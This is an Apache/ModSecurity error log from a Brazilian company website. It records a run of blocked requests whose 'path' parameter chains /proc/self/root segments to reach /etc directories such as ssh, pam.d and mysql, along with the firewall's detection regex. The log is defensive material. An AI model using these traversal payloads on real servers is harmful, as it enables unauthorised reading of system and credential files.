[Mon Mar 16 16:17:11.931853 2026] [:error] [pid 14895:tid 140411733534464] [client 74.7.241.46:35004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXN1ajLEzk2WiQ-10jWwAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:17:18.428048 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:45664] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXPo6lpbStxTqkSkt8UgAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:17:24.502650 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:45678] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXRKTCbgAP5jq5Teg9WQAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:17:30.617645 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.241.46:37204] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXSlajLEzk2WiQ-10jZwAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:17:36.548559 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:37216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXUP9ocpUE4ed4uDwDNQAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:17:42.710189 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.241.46:49886] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXVs_BxrYCr4hPDw_7kQAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:17:48.826317 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:42508] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXXLysWC90G-1nBrBUuwAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:17:55.210780 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.241.46:42522] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXY6TCbgAP5jq5Teg9YAAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:18:01.124533 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:52380] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXadSswJuvopo3lOhv2wAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:18:07.490994 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.241.46:52392] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXb7ABkC4fWIHEf8ECUAAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:18:13.707117 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:44110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXdbysWC90G-1nBrBUvwAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:18:19.736434 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:51902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXe7ABkC4fWIHEf8ECUwAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:18:25.650965 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:51906] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXgaQpVkWug9HeOt9HYQAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:18:33.339009 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:56420] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXiLABkC4fWIHEf8ECWAAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:18:38.024728 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.241.46:56424] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXjv9ocpUE4ed4uDwDRgAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:18:44.410275 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:59742] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXlNSswJuvopo3lOhv5QAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:18:50.903889 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:44366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXmv9ocpUE4ed4uDwDSgAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:19:08.892109 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:45968] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXrP9ocpUE4ed4uDwDTgAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:19:21.074754 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.243.203:38136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXubysWC90G-1nBrBU8gAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:19:24.580640 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:43984] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXvLysWC90G-1nBrBU-AAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:19:27.810596 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.243.203:43998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXvf9ocpUE4ed4uDwDVQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
